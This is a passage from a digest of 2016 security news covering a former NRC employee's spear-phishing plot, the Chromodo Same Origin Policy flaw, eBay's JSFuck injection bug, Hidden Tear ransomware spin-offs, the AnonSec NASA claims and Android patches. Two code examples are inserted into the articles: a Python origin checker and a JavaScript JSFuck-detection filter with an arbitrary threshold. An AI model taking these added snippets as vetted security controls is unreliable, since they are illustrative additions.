The man tried to sell information about his colleagues to foreign governments. Prosecutors confirmed the case was discovered in 2013, after Eccleston visited an unnamed foreign embassy in Manila, Philippines, and offered for sale more than 5,000 e-mail addresses of internal employees (officials, engineers, and employees of a US government agency).
FBI agents posing as embassy employees collected evidence of the man’s intent. The man was also offering access to agency systems to support espionage activities.
The man used emails that pretended to be sent by the organizations behind conferences related to nuclear energy.
“Thereafter, Eccleston met and corresponded with FBI undercover employees who were posing as representatives of the foreign country. During a meeting on Nov. 7, 2013, he showed one of the undercover employees a list of approximately 5,000 e-mail addresses that he said belonged to NRC employees. He offered to sell the information for $23,000 and said it could be used to insert a virus onto NRC computers, which could allow the foreign country access to agency information or could be used to otherwise shut down the NRC’s servers,” states the press release. “The undercover employee agreed to purchase a thumb drive containing approximately 1,200 e-mail addresses of NRC employees; an analysis later determined that these e-mail addresses were publicly available. The undercover employee provided Eccleston with $5,000 in exchange for the e-mail addresses and an additional $2,000 for travel expenses.”
“Over the next several months, Eccleston corresponded regularly by e-mail with the undercover employees. A follow-up meeting with a second undercover employee took place on June 24, 2014, in which Eccleston was paid $2,000 to cover travel-related expenses. During this meeting, Eccleston discussed having a list of 30,000 e-mail accounts of DOE employees. He offered to design and send spear-phishing e-mails that could be used in a cyber-attack to damage the computer systems used by his former employer.”
The FBI undercover agents provided Eccleston with a link to include in the malicious email. The man believed the link pointed to a malicious domain serving malware; instead, it was harmless. Altogether, the defendant sent the e-mail he believed to be infected to approximately 80 DOE employees located at various facilities throughout the country, including offices and laboratories associated with nuclear materials.
Eccleston was fired from the NRC in 2010 for unknown reasons and moved to Davao City in the Philippines in 2011.
“Combating cyber-based threats to our national assets is one of our highest priorities,” Assistant Attorney General for National Security John P. Carlin said in a statement.
“We must continue to evolve our efforts and capabilities to confront cyber enabled threats and aggressively detect, disrupt and deter them.”
Eccleston was detained by Philippine law enforcement on March 27, and on Friday he will make a court appearance at the U.S. District Court for the District of Columbia.
According to the Justice Department, the man will remain detained until a hearing scheduled for May 20.
The offense carries a penalty of up to 10 years in prison plus financial penalties, but given Eccleston’s age and record, under the advisory federal sentencing guidelines the former DOE worker is likely to receive a prison term of 24 to 30 months and a fine of up to $95,000.
Latest Windows 10 May Have a Linux Subsystem Hidden Inside
3.2.2016 OS
A few months back, Microsoft impressed the world with its 'Microsoft loves Linux' announcements, including the development of a custom Linux-based OS for running Azure Cloud Switch and the selection of Ubuntu as the operating system for its cloud-based Big Data services.
Now, a renowned Windows hacker and computer expert who goes by the name ‘WalkingCat’ has discovered that the latest version of Windows 10 may have a Linux subsystem secretly installed inside.
According to his tweets, the hacker spotted two mysterious files, LXss.sys and LXCore.sys, in the latest Windows 10 Redstone build, 14251, which are suspected to be part of Microsoft’s Project Astoria.
Project Astoria, also known as Windows Bridge for Android, is a toolkit that allows running Android apps on Windows 10 Mobile devices.
The naming convention of the newly discovered files is very similar to that of the Android subsystem files from Project Astoria, e.g. ADss.sys.
The "LX" in these names can only be taken to mean one thing, Linux, which suggests that Windows 10 will also have access to a Linux subsystem.
Why a Linux Subsystem?
Since Windows 10 has been introduced as a universal operating system for all devices, it is possible that Microsoft wants to expand Project Astoria from mobile devices to desktop users.
If this turns out to be true, adding a Linux subsystem would be beneficial should Microsoft plan to offer support for Linux applications, especially server-related technology and software.
Isn't this exciting?
Here's Why Microsoft Drops a Cloud Data Center Under the Ocean
3.2.2016 OS
While tech companies like Facebook and Google prefer to move their data centers to colder countries to reduce their air conditioning bill, Microsoft has come up with an even better home for data centers that cuts the high energy costs of cooling them: under the sea.
Here's what Microsoft says:
"50% of us live near the coast. Why doesn't our data?"
Building massive data centers underwater might sound crazy, but that is exactly what Microsoft is testing with its first submarine data center, dubbed Leona Philpot.
World's First Underwater Data Center
The testing is part of Microsoft’s plan dubbed Project Natick — an ongoing research project to build and run a data center that is submerged in the ocean, which the company believes, could make data centers faster, cost-effective, environmentally friendly and easier to set up.
Leona Philpot (named after the Halo character from Microsoft's Xbox) was tested last August, when engineers placed an enormous steel capsule a kilometer off the California coast, 30 feet underwater in the Pacific Ocean.
A single datacenter computing rack was placed in an eight-foot-wide steel capsule, which was covered in around 100 sensors to monitor every aspect of the underwater conditions: pressure, humidity, and, most importantly, motion.
The test ran from August to November last year (exactly 105 days) and the engineers said it was more successful than expected.
Why Underwater Data Center?
According to Microsoft, these are the main reasons for experimenting with underwater data centers:
1. Air conditioning cost is one of the biggest pains in running data centers. Traditional data centers are believed to consume up to 3 percent of the world's electricity.
So, placing the data centers in the ocean eliminates the need for air conditioning and will sharply cut the energy costs of cooling the racks upon racks of servers that process and store the world's digital lives.
2. Half of the world's population is located within 200 kilometers of the coast, so placing data centers in the sea would reduce latency – the time data takes to travel from its source to customers, which simply means faster delivery of data.
3. Reduce the time to build a data center from 2 Years to 90 Days. Microsoft believes that if it can mass produce the steel capsules, the company could build data centers in just 90 days.
This would make its operations cheaper and much quicker than the time needed to set a data center up on land.
Moreover, the capsules designed by the company would also adopt new, innovative rack designs that do not even need to consider human interaction.
4. Use of Renewable Energy. The project's engineers even believe that in future, underwater data centers might be able to power themselves by renewable energy, as in this case, perhaps underwater turbines or tidal power to generate electricity.
5. Environment-Friendly. Microsoft will also be tackling environmental concerns related to underwater data centers. The company says its current underwater data center prototype emits an "extremely" small amount of heat energy into the surrounding waters.
A Few Limitations:
Data centers on land are open for IT engineers to fix issues and replace servers whenever required, but the company wants its undersea data centers to go without maintenance for years at a time.
Since Microsoft doesn't have a team of Scuba engineers, each Natick data center unit would operate for over 5 years without maintenance and then it would be dragged up to the surface to have its internal parts replaced.
Other obvious risks for submarine data centers include corrosive saltwater and the weather, to name just two potential hurdles.
Future Of The Data Center
The company started working on this idea in 2013, but the development of a physical prototype began in 2014, and its first ever submarine data server, Leona Philpot, went into the water in August last year.
Since Microsoft's Project Natick is still in its "early days," it is hard to say when underwater data centers can actually be adopted. However, Microsoft has plans to design a new version of underwater data center that is three times larger than Leona Philpot.
It is not just Microsoft; many tech companies are considering new ways of housing data. In 2013, Facebook located one of its latest state-of-the-art data centers in Luleå, the far north of Sweden, to make use of cheap, renewable energy generated by hydroelectric schemes and outside air for cooling.
Comodo's so-called 'Secure Internet Browser' Comes with Disabled Security Features
3.2.2016 Security
Beware Comodo Users!
Have you Safeguarded your PC with a Comodo Antivirus? Then you need to inspect your system for privacy and security concerns.
First of all, check whether your default browser has been changed to "Chromodo" -- a free browser offered by Comodo Antivirus.
If the answer is "Yes," then you could be at risk!
Chromodo browser, which is supplied along with the installation of Comodo Anti-Virus software and marketed as a 'Private Internet Browser' for better security and privacy, automatically overrides system settings to set itself as your 'Default Browser.'
And secondly, the main security concern about Comodo Antivirus is that the Chromodo browser has the 'Same Origin Policy' (SOP) disabled by default.
Google's security researcher Tavis Ormandy recently called out Comodo for disabling SOP by default in its browser settings, which violates one of the strongest browser security policies.
Ormandy notes that "all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices."
Moreover, changing default browser settings without users' knowledge is a totally unethical move.
Same Origin Policy (SOP) is one of the browser security policies that permits scripts running in a web browser to only make requests to pages on the same domain.
If enabled, Same Origin Policy will prevent malicious scripts on one page from obtaining access to sensitive data on another web page.
What If Same Origin Policy is Disabled?
To understand this, assume you are logged into Facebook and somehow visit a malicious website in another tab.
With SOP disabled, various malicious script files on that website could take over the control of your Facebook profile, allowing malicious actors to compromise your account with access to your private messages, post status updates, etc.
That is what Comodo is doing to its users: by disabling SOP by default in Chromodo, it could allow attackers to:
Steal session authentication cookies.
Perform malicious actions through script code.
Even replace trusted websites with attacker-created HTML.
How to Check If your Browser has SOP Enabled/Disabled
If you are still unsure whether your browser is SOP disabled, then visit this link.
If you get the message "Browser appears to be fine," then you are out of danger.
But if you get a negative result such as "Your browser is not enforcing the SOP," you are advised to migrate to another browser such as Chrome or Firefox for your self-defense against any malicious attack.
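Added example (not from the article or from Comodo): a small Python model of the origin comparison behind the Same Origin Policy, applied to the logged-in-Facebook-plus-malicious-tab scenario above. Browsers compare the (scheme, host, port) triple, normalising default ports; the sop_enforced flag models Chromodo's disabled default. The URLs are constructed.

```python
from urllib.parse import urlsplit

# Ports a browser treats as implicit for each scheme, so that
# https://example.com and https://example.com:443 are the same origin.
DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}


def origin(url: str) -> tuple:
    """Return the (scheme, host, port) triple that the Same Origin Policy compares.
    Scheme and host are case-insensitive; a missing port means the scheme default."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(page_url: str, target_url: str) -> bool:
    return origin(page_url) == origin(target_url)


def script_may_read(page_url: str, target_url: str, sop_enforced: bool = True) -> bool:
    """Whether a script running in the page at page_url may read the response or
    DOM of target_url. With the policy switched off, as in Chromodo's default,
    every cross-origin read is allowed."""
    return same_origin(page_url, target_url) if sop_enforced else True


def exposure_report(logged_in_urls, attacker_page: str, sop_enforced: bool) -> list:
    """List the logged-in resources a script on attacker_page could read."""
    return [u for u in logged_in_urls if script_may_read(attacker_page, u, sop_enforced)]


# Constructed scenario from the article: a logged-in Facebook session in one tab
# and a malicious site open in another.
LOGGED_IN = ["https://www.facebook.com/messages/", "https://www.facebook.com/settings"]
ATTACKER_PAGE = "https://malicious.example/"

if __name__ == "__main__":
    for enforced in (True, False):
        exposed = exposure_report(LOGGED_IN, ATTACKER_PAGE, enforced)
        print(f"SOP enforced={enforced}: attacker page can read {exposed or 'nothing'}")
```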
On Friday, the United Nations can decide that Assange is being illegally detained
3.2.2016 BigBrothers
On Friday the United Nations can decide that Assange is being illegally detained; in this case the UK and Sweden must immediately release him.
The United Nations will reveal very soon the results of its investigation into the case of Julian Assange, the Wikileaks founder. WikiLeaks publishes secret information and classified media from anonymous sources. Wikileaks has already published more than 10 million documents, and Assange describes his platform as “a giant library of the world’s most persecuted documents”.
The decision is set to be announced next Friday, 4 February, when the UN could order the release of Assange.
Julian Paul Assange is an Australian journalist that founded Wikileaks in 2006, he is currently residing in the Ecuador embassy in London, after having been granted political asylum in August 2012.
Many ignore that Assange has a past as a hacker, in 1987 under the pseudonym Mendax he hacked many organizations with two colleagues known as “Trax” and “Prime Suspect.”
The list of victims is long and includes the Pentagon, the U.S. Navy, NASA, and Australia’s Overseas Telecommunications Commission; Citibank, Lockheed Martin, Motorola, Panasonic, and Xerox.
In 1996, he pleaded guilty to twenty-five charges and was ordered to pay reparations of A$2,100 and released on a good behavior bond.
Assange has been residing in the embassy since 2012 to avoid extradition, the popular journalist is facing sexual assault allegations in Sweden, meanwhile, the United States ask him to respond the accusation of cyber espionage for publishing classified US military and diplomat documents.
On September 2014, Julian Assange filed a complaint against Sweden and the United Kingdom, that has been considered by the UN Working Group on Arbitrary Detention.
We have to sit and wait for the decision on the Assanges’ case. If the and if the group will decide that the man is being illegally detained, the UN is expected to call on the UK and Sweden to release him.
“IF THE WGAD FINDS IN FAVOUR OF JULIAN ASSANGE — WHAT HAPPENS NEXT?
If the WGAD finds in Julian Assange’s favour, it will declare that Julian Assange is arbitrarily detained. In this case the UK and Sweden must immediately release and compensate him.”
A severe vulnerability affects eBay, beware of phishing attacks
3.2.2016 Vulnerability
Researchers from Check Point have discovered a flaw affecting the eBay platform that could allow attackers to launch phishing attacks against visitors.
A group of researchers from Check Point have discovered a vulnerability affecting the eBay online sales platform that could allow attackers to launch phishing attacks against visitors.
Visitors could be tricked into opening a page on the site that exposes them to phishing attacks. This is possible because the attacker can bypass the site’s code validation and execute malicious JavaScript in the users’ browser or mobile app.
The attack scenario is very simple: hackers can target eBay users by sending them a link to a legitimate eBay page that contains malicious code. Using social engineering, the users can be tricked into opening the malicious page, triggering the code execution and leading to multiple attack scenarios that range from phishing to binary download.
“Check Point has discovered a severe vulnerability in eBay’s online sales platform. This vulnerability allows attackers to bypass eBay’s code validation and control the vulnerable code remotely to execute malicious Java script code on targeted eBay users. If this flaw is left unpatched, eBay’s customers will continue to be exposed to potential phishing attacks and data theft.” states a blog post published by the company.
The attacker would have to use JSF**k, a non-standard technique, in the item description to inject the code. The researchers discovered that while eBay forbids users from including scripts and iframes in descriptions by filtering them out, the validation mechanism fails in the presence of JSF**k code.
What is JSF**k?
JSFuck is “an esoteric and educational programming style based on the atomic parts of JavaScript” that uses only six different characters, []()!+, to write and execute code, according to the description on the official website.
eBay doesn’t filter it, allowing attackers to use it to bypass the validation mechanism in place.
“This allows the attacker to insert a remote controllable JavaScript that he can adjust to, for example, create multiple payloads for a different user agent,” Check Point writes, adding that an attacker could use it to trick a victim into downloading a malicious app or use the vulnerability to carry out phishing attacks.
The bad news is that the researchers reported the issue to eBay on December 15, 2015, but just two weeks ago the company replied that it had no plans to fix the problem.
“As we demonstrated to the eBay security team in the proof of concept, we were able to bypass their security policies and insert a malicious code to our seller page without any difficulty or restriction,” continues the post.
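Why a tag-only description filter misses JSFuck, and the check a validator can add, as an added example that is not code from Check Point's post or from eBay; the sample descriptions, the filter regex and the run-length threshold are constructed for this illustration, and eBay's real filter is not known beyond what the post states.

```javascript
// Added example, not code from Check Point's post or from eBay: a filter that
// only rejects <script>/<iframe> tags versus one that also spots JSFuck runs.

// The six characters JSFuck is written in, as named on its official site.
const JSFUCK_ALPHABET = new Set(['[', ']', '(', ')', '!', '+']);

// The coercions JSFuck builds on: every letter of these strings can be indexed
// out with more of the same six characters, so a payload needs no letters,
// quotes or tags at all. Each value here is produced by the JS engine itself.
function jsfuckPrimitives() {
  return {
    falseStr: ![] + [],          // "false"
    trueStr: !![] + [],          // "true"
    zero: +[],                   // 0
    one: +!![],                  // 1
    letterF: (![] + [])[+[]],    // "f", i.e. "false"[0]
  };
}

// A description filter of the kind the researchers describe eBay applying:
// reject obvious script and frame tags, pass everything else.
function tagOnlyFilterAllows(description) {
  return !/<\s*(script|iframe)\b/i.test(description);
}

// Longest run of consecutive characters drawn only from the JSFuck alphabet.
// Ordinary prose with brackets and exclamation marks produces very short runs.
function longestJsfuckRun(text) {
  let best = 0, cur = 0;
  for (const ch of text) {
    if (JSFUCK_ALPHABET.has(ch)) {
      cur += 1;
      if (cur > best) best = cur;
    } else {
      cur = 0;
    }
  }
  return best;
}

// Hardened validator: keep the tag check and also reject descriptions with a
// long run of JSFuck characters. The threshold of 40 is an assumption chosen
// here; legitimate text stays far below it and a useful JSFuck payload runs
// to thousands of characters.
function hardenedFilterAllows(description, minRun = 40) {
  return tagOnlyFilterAllows(description) && longestJsfuckRun(description) < minRun;
}

// Constructed sample descriptions (not from the Check Point proof of concept).
// The JSFuck-style one repeats the harmless fragment that evaluates to "f".
const SAMPLES = {
  legit: 'Vintage film camera (lightly used)! Ships in 2 days.',
  tagged: 'Great phone <script>x()</script>',
  jsfuckStyle: 'Great phone ' + '(![]+[])[+[]]+'.repeat(6) + '(![]+[])[+[]]',
};

function demo() {
  for (const [name, text] of Object.entries(SAMPLES)) {
    console.log(
      `${name}: tag-only filter allows=${tagOnlyFilterAllows(text)} ` +
      `hardened filter allows=${hardenedFilterAllows(text)} ` +
      `longest JSFuck run=${longestJsfuckRun(text)}`,
    );
  }
}

demo();
```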
Cybersecurity Operational Tests And Assessments – US Defence can’t check F-35 data due to insecure systems
3.2.2016
Cybersecurity Operational Tests And Assessments conducted by the US Defence are essential to improving overall security … and have revealed that the US Government can’t check F-35 data due to insecure systems.
It is difficult to grasp the importance of concepts like information sharing in daily work, but officers at the Pentagon are learning it at their own expense. The Pentagon is currently unable to check on key maintenance of the F-35 Joint Strike Fighter (JSF) because the data is stored in an insecure database managed by the giant Lockheed Martin.
The F-35 component and airframe maintenance data is held in a database that is non-compliant with US Cyber Command security requirements issued in August; for this reason, government personnel cannot access the archive from government networks.
According to the “FY 2015 Annual Report for the Office of the Director, Operational Test & Evaluation,” government staff cannot access non-compliant systems via government networks for security reasons.
Michael Gilmore, the Defense Department’s operational test and evaluation chief, also discovered a number of security issues affecting Defence architectures, including misconfigured and unpatched systems and poor authentication processes.
This is disconcerting if we consider the effort of the Department of Defense (DOD) in the Cybersecurity Operational Tests And Assessments in FY15.
“DOD cyber teams include organizations that provide OPFOR aggressors (Red Teams) as well as penetration testers and teams that perform other cybersecurity assessments (Blue Teams). DOT&E guidance establishes data and reporting requirements for cyber team involvement in both operational tests of acquisition systems and exercise assessments. The demand on DOD-certified Red Teams, which are the core of the cyber OPFOR teams, has increased significantly in the past 3 years,” states a report on cyber security and operational tests. “In the same timeframe, the Cyber Mission Force and private sector have hired away members of Red Teams, resulting in staffing shortfalls at a time when demand is likely to continue to increase. This trend must be reversed if the DOD is to retain the ability to effectively train and assess DOD systems and Service members against realistic cyber threats.”
Although the Defence is investing heavily in operational tests, it often limits the red teams’ full scope to operate as opposing forces (OPFOR) during training because it fears possible side effects.
“DOT&E believes the reluctance by Combatant Commands (CCMDs) and Services to permit realistic cyber effects during major exercises is due to the requirement to achieve numerous other training objectives in those exercises. Additionally, exercise authorities have stated they fear that cyber attacks could distract from—and possibly preclude—achieving these objectives.”
This is a totally wrong approach: threat actors will attack Defense and mission-critical systems by any method and at any moment, so it is important to stress the systems in an attempt to find flaws before the intruders do.
Gilmore explained that Defence red teams, that is, OPFOR (opposing forces in war games), are deployed in only the most security-savvy organisations.
“In order to attain a high state of mission readiness, CCMDs (Combatant Commands) and supporting defenders should conduct realistic tests and training that include cyber attacks and effects representative of those that advanced nation states would execute,” Gilmore writes.
Training efforts and cyber security assessments are crucial to building an architecture resilient to cyber attacks; the US government is aware of this and has already planned cyber security tests for 2016.
Wikileaks' Julian Assange Could Be Set Free on Friday by the United Nations
2.2.2016
The decision of the United Nations investigation into the Julian Assange case is set to be revealed and could order the release of the Wikileaks founder on February 5.
"BREAKING: UN set to announce decision on #Assange's release on Friday," Wikileaks has tweeted.
Assange has been living in the Ecuadorian embassy in London for over 3 years, after being granted political asylum by the government of the South American country.
Assange has been residing in the embassy since 2012 to avoid extradition:
First to Sweden where he is facing sexual assault allegations, which he has always denied.
Ultimately to the United States, where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.
The publication of those secret documents amounted to the largest information leak in United States history. The US also launched a criminal case against Assange following the leak.
However, Assange filed a complaint against Sweden and the United Kingdom in September 2014 that has been considered by the UN Working Group on Arbitrary Detention.
The decision on the case will be published on Friday, and if the group concludes that Assange is being illegally detained, the UN is expected to call on the UK and Sweden to release him.
Hidden tear and its spin offs
2.2.2016 Source: Kaspersky
Background
A while ago the Turkish security group Utku Sen created the hidden tear ransomware and published the source code online. The idea behind it was to “teach” security researchers how ransomware works. Right from the beginning, the reaction of various security professionals was negative, and we were right: it didn’t take long before the first ransomware variants based on the hidden tear source code arrived ([1], [2]), and of course things escalated a bit.
Wondering what else there was, I decided to analyze the samples in the Trojan-Ransom.MSIL.Tear class and was amazed to find 24 additional samples.
The spin offs
Hidden tear only encrypts files located on the user’s desktop in the “\test” directory. If such a directory doesn’t exist, then no files are encrypted and no harm is done. In one of the first samples we classified as hidden tear, Trojan-Ransom.MSIL.Tear.c, the “\test” directory was removed, so in this case all the files (with certain extensions) located on the Desktop are encrypted.
Another sample, Trojan-Ransom.MSIL.Tear.f, calls itself KryptoLocker. According to the ransom message, public key cryptography was used, but when we look at the code, we see something different. The author also didn’t use a CnC this time, but asked the victims to e-mail him so that he could demand the ransom.
The next variants, Trojan-Ransom.MSIL.Tear.g and Trojan-Ransom.MSIL.Tear.h, are the first versions that use a proper CnC (previous samples used a server with an internal IP address as the CnC server). Other samples, such as Trojan-Ransom.MSIL.Tear.i and Trojan-Ransom.MSIL.Tear.k, share the same CnC, while Trojan-Ransom.MSIL.Tear.j uses another one.
Also interesting is Trojan-Ransom.MSIL.Tear.m. This variant specifically looks for files located in the “Microsoft\Atom” directory.
Variants Trojan-Ransom.MSIL.Tear.n, Trojan-Ransom.MSIL.Tear.o, Trojan-Ransom.MSIL.Tear.p and Trojan-Ransom.MSIL.Tear.q, on the other hand, just encrypt your files and don’t store the key anywhere.
Variants Trojan-Ransom.MSIL.Tear.r to Trojan-Ransom.MSIL.Tear.v are all more or less the same. The C2 address is often example.com, which of course does not work.
The last samples, Trojan-Ransom.MSIL.Tear.w, Trojan-Ransom.MSIL.Tear.x and Trojan-Ransom.MSIL.Tear.y, all store the password on the hard drive and were also described earlier here.
Conclusion
As always, when malware gets open sourced, we see an increase in variants of that specific malware. We can therefore conclude that hidden tear completely missed its purpose. Researchers don’t need hidden tear to understand how ransomware works. Luckily, in this case, the copycats didn’t fix the bugs in hidden tear. Therefore it is actually possible (with some computation) to recover your key and decrypt your files for free. More worrisome is when copycats take well-developed, sophisticated malware and start using that.
The samples discussed in this post were all rarely spotted in the wild. This means the number of victims remains relatively low.
Nevertheless, bugs can be fixed and the malware can be enhanced without much effort. After this point, it is just waiting for future victims who might lose their files forever.
NASA HACKED! AnonSec tried to Crash $222 Million Drone into Pacific Ocean
2.2.2016
Once again the red alarm has sounded at the security desk of the National Aeronautics and Space Administration (NASA).
Yes! This time, a serious act of hacktivism was carried out by the hacking group named "AnonSec", which made its name in the cyber universe with previous NASA hacks.
The AnonSec members allegedly released 276 GB of sensitive data, which include 631 video feeds from aircraft and weather radars, 2,143 flight logs, and the credentials of 2,414 NASA employees, including e-mail addresses and contact numbers.
The hacking group has released a self-published paper named "Zine" that explains the magnitude of the major network breach that compromised NASA systems and their motives behind the leak.
Here’s How AnonSec Hacked into NASA
The original cyber attack against NASA was not initially planned by AnonSec members; the attack took shape soon after the spread of the Gozi virus, which affected millions of systems a year ago.
After purchasing an "initial foothold" in 2013 from a hacker with knowledge of NASA servers, the AnonSec group claimed to have pentested the NASA network to figure out how many systems were penetrable, the group told InfoWars.
Brute-forcing an admin's SSH password took only 0.32 seconds due to the weak password policy, and the group gained further internal access that allowed it to grab more login information with a hidden packet sniffing tool.
They also claimed to have successfully infiltrated the Goddard Space Flight Center, the Glenn Research Center, and the Dryden Research Center.
Hacker Attempted to Crash $222 Million Drone into the Pacific Ocean
Three NAS (Network Attached Storage) devices that hold aircraft flight log backups were also compromised, rapidly opening the door to an extended hack:
Hacking Global Hawk drones, which specialize in surveillance operations.
The hackers tried to gain control over the drone by re-routing its flight path (using a Man-in-the-Middle, or MitM, strategy) to crash it into the Pacific Ocean, but…
…a sudden alert about the unusual flight plan led NASA engineers to take manual control, saving their $222.7 Million drone from ending up in the ocean.
The attempt was possible because of the routine practice of drone operators uploading the flight path for the next flight soon after a drone session ends.
After this final episode, AnonSec lost control over the compromised NASA servers, and NASA engineers restored everything to normal.
This shows the magnitude of the attack, which spread into other NASA pipelines and led to this nasty situation.
However, in a statement emailed to Forbes, NASA denied the alleged hacking incident, saying the leaked information could be part of freely available datasets and that there is no proof a drone was hijacked.
“Control of our Global Hawk aircraft was not compromised. NASA has no evidence to indicate the alleged hacked data are anything other than already publicly available data. NASA takes cybersecurity very seriously and will continue to fully investigate all of these allegations.”
Why Did AnonSec Hack into NASA?
Before you point your finger at the AnonSec hackers, wait! Here's what the group wants to highlight:
"One of the main purposes of the Operation was to bring awareness to the reality of Chemtrails/CloudSeeding/Geoengineering/Weather Modification, whatever you want to call it, they all represent the same thing."
"NASA even has several missions dedicated to studying Aerosols and their affects (sic) on the environment and weather, so we targeted their systems."
And Here's What NASA was actually doing:
Cloud seeding: A weather modification method that uses silver iodide to create precipitation in clouds, producing more rainfall to counter carbon emissions, which ultimately manipulates nature.
Geoengineering: Geoengineering aims to tackle climate change by removing CO2 from the air or limiting the sunlight reaching the planet.
Similar projects run on behalf of the US Government, such as Operation IceBridge (OIB) and Aerosol-Cloud-Ecosystem (ACE), are dedicated to climate modeling.
This security breach would be a black mark for NASA's security team and a warning bell to beef up security.
They Named it — Einstein, But $6 Billion Firewall Fails to Detect 94% of Latest Threats
2.2.2016
The US government's $6 Billion firewall is nothing but a big blunder.
Dubbed EINSTEIN, the nationwide firewall run by the US Department of Homeland Security (DHS) is not as smart as its name suggests.
An audit conducted by the United States Government Accountability Office (GAO) has claimed that the firewall used by US government agencies is failing to fully meet its objectives and leaving the agencies open to zero-day attacks.
EINSTEIN, which is officially known as the US National Cybersecurity Protection System (NCPS) and has cost $5.7 Billion to develop, detects only 6 percent of today's most common security vulnerabilities and fails to detect the remaining 94 percent.
How bad is EINSTEIN Firewall in reality?
In a series of tests conducted last year, Einstein only detected 29 out of 489 vulnerabilities across Flash, Office, Java, IE and Acrobat disclosed via CVE reports published in 2014, according to a report [PDF] released by the GAO late last year.
Among the extraordinary findings is the fact that the system is:
Unable to monitor web traffic for malicious content.
Unable to uncover malware in a system.
Unable to monitor cloud services either.
Limited to signature-based threat and intrusion detection, rather than monitoring for unusual activity.
Yes, Einstein only carries out signature-based threat and intrusion detection, which means the system acts like a dumb terminal that waits to be told what to look for, rather than searching for unusual activity itself.
Einstein Uses Outdated Signatures Database
In fact, more than 65 percent of intrusion detection signatures (digital fingerprints of known viruses and exploit code) are outdated, making Einstein wide open to recently discovered zero-day vulnerabilities.
However, in response to this, DHS told the GAO that Einstein was always meant to be a signature-based detection system only. Here's what the department told the auditors:
"It is the responsibility of each agency to ensure their networks and information systems are secure while it is the responsibility of DHS to provide a baseline set of protections and government-wide situational awareness, as part of a defense-in-depth information security strategy."
Einstein is Effectively Blind
If this wasn't enough to judge the worth of the $6 Billion firewall, Einstein is effectively blind.
The Department of Homeland Security (DHS), which is behind the development of Einstein, has not included any feature to measure the system's own performance, so the system doesn't even know if it is doing a good job or not.
So, "until its intended capabilities are more fully developed, DHS will be hampered in its abilities to provide effective cybersecurity-related support to federal agencies," reads the report.
Einstein was actually developed in 2003 to automatically monitor agency network traffic, and later in 2009 expanded to offer signature-based detection as well as malware-blocking abilities.
Most of the 23 agencies are actually required to implement the firewall, but the GAO found that only 5 of them were utilising the system to deal with possible intrusions.
Despite $1.2 Billion spent in 2014 and $5.7 Billion on the project in total, Einstein still only monitors certain types of network flaws, with no support for monitoring web traffic or cloud services.
DropboxCache Backdoor, a new Cross-Platform threat
2.2.2016
Security experts at Kaspersky Lab have discovered a new cross-platform backdoor dubbed DropboxCache, ported from Linux to Windows.
Security experts at Kaspersky Lab have discovered a new cross-platform backdoor dubbed DropboxCache (Backdoor.Linux.Mokes.a), initially affecting Linux systems and now migrated to Windows. The backdoor allows attackers to gain complete control over the victim’s machine, and it also implements an audio capture feature. To achieve the portability of the DropboxCache backdoor, the authors used C++ and Qt, a common choice in the development community.
The experts at Kaspersky noticed that the authors didn’t put effort into obfuscation; analysis of the code allowed investigators to find the IP address of the command and control (C&C) server hardcoded into it, and the malware contacts the server every minute.
The authors digitally signed the code with a trusted certificate issued by COMODO RSA Code Signing CA, but Kaspersky did not reveal the name of the entity to which the certificate was issued.
“Next, it connects to its hardcoded C&C Server. From this point, it performs an http request every minute. This “heartbeat” request replies with a one-byte image. To upload and receive data and commands, it connects to TCP port 433 using a custom protocol and AES encryption.”
A few days ago, the experts spotted a second backdoor called OLMyJuxM.exe (Backdoor.Win32.Mokes.imv) infecting Windows machines. Analysis of this strain allowed the experts at Kaspersky to discover that it is a 32-bit Windows variant of the DropboxCache backdoor.
“Just a few days ago, we came across a rather familiar looking sample, although it was compiled for machines running Microsoft Windows. It quickly turned out to be a 32-bit Windows variant of Backdoor.Linux.Mokes.a.” continues the post.
The Windows variant of the DropboxCache backdoor uses the same filename templates to save the captured audio, screenshots, keylogs and other data. Unlike the Linux variant, the Windows strain enables the keylogging feature at startup.
What about the future?
Experts speculate that a Mac OS X variant will soon be found in the wild.
Google Patches Critical Remotely-exploitable Flaws in Latest Android Update
2.2.2016
Google has released the February Security Update for Android that patches multiple security vulnerabilities discovered in the latest version of Android operating system.
In total, five "critical" security vulnerabilities were fixed in the release, along with four "high" severity issues and one merely "moderate" issue.
Remote Code Execution Flaw in WiFi
A set of two critical vulnerabilities has been found in the Broadcom WiFi driver that could be exploited by attackers to perform Remote Code Execution (RCE) on affected Android devices when connected to the same network as the attacker.
The vulnerabilities (CVE-2016-0801 and CVE-2016-0802) can be exploited by sending specially crafted wireless control message packets that can corrupt kernel memory, potentially leading to remote code execution at the kernel level.
"These vulnerabilities can be triggered when the attacker and the victim are associated with the same network," reads the advisory. "This issue is rated as a Critical severity due to the possibility of remote code execution in the context of the kernel without requiring user interaction."
Remote Code Execution Flaw in Mediaserver
Another set of two critical security vulnerabilities was discovered in Mediaserver, the component targeted last summer by the critical Stagefright vulnerabilities and exploits, which allowed anyone to compromise an Android device by sending just a specially crafted MMS message.
The recently discovered flaws (CVE-2016-0803 and CVE-2016-0804) in Mediaserver could enable remote code execution (RCE) on affected Android devices through email, web browsing, or MMS files when processing media files.
Moreover, a separate elevation of privilege vulnerability (CVE-2016-0810) was also discovered in Mediaserver that could be exploited to gain elevated capabilities, including Signature or SignatureOrSystem permissions, which aren’t accessible to third-party apps.
Two elevation of privilege vulnerabilities have also been found in Qualcomm components: the Qualcomm Performance Module (CVE-2016-0805) and the Qualcomm Wi-Fi Driver (CVE-2016-0806). Both flaws, rated as critical, could allow an attacker to launch further attacks.
Another critically rated bug (CVE-2016-0807), discovered in the Debuggerd component, could allow arbitrary code execution at the device's root level. Debuggerd is a software tool used for debugging and analyzing Android crashes.
Other high severity bugs include:
An elevation of privilege vulnerability in the Android Wi-Fi component
A denial-of-service vulnerability in the Minikin library
An information disclosure bug in libmediaplayerservice
The final vulnerability is an elevation of privilege flaw in Setup Wizard that could allow an attacker to bypass Factory Reset Protection and gain access to the affected device.
All the security patches are currently available for Nexus devices only. Google also shared the patches with carrier and manufacturer partners on January 4, but users of other Android devices will have to wait until their devices receive an update.
